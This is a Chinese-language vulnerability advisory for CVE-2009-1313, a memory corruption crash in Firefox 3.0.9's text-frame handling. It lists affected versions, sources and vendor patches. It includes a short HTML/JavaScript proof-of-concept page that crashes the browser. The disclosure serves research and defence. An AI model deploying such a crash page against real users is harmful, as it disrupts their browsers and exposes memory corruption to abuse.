发布日期：2009-04-27
更新日期：2009-04-28

受影响系统：

Mozilla Firefox 3.0.9

不受影响系统：

Mozilla Firefox 3.0.10

描述：

---

BUGTRAQ  ID: 34743
CVE(CAN) ID: CVE-2009-1313

Firefox是一款流行的开放源码WEB浏览器。

Firefox的nsTextFrame::ClearTextRun()函数中存在内存破坏漏洞，如果用户受骗打开了包含有恶意内容的网页就会导致浏览器崩溃。安装了HTML Validator附件组件的用户尤其受这个漏洞的影响。

<*来源：Marc Gueury
        Daniel Veditz
  
  链接：http://www.mozilla.org/security/announce/2009/mfsa2009-23.html
        https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=489647
        http://secunia.com/advisories/34866/
        https://www.redhat.com/support/errata/RHSA-2009-0449.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html><head><title> Bug 489647 -  New 1.9.0.9 topcrash [@nsTextFrame::ClearTextRun()]</title></head>
<body>
<div id="a" style="white-space: pre;">
m</div>
<script>
function doe() {
  document.getElementById('a').childNodes[0].splitText(1);
}
setTimeout(doe, 100);
</script>
</body>
</html>

建议：

---

厂商补丁：

Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.mozilla.org/

RedHat
------
RedHat已经为此发布了一个安全公告（RHSA-2009:0449-01）以及相应补丁:
RHSA-2009:0449-01：Critical: firefox security update
链接：https://www.redhat.com/support/errata/RHSA-2009-0449.html

浏览次数：2520
严重程度：0（网友投票）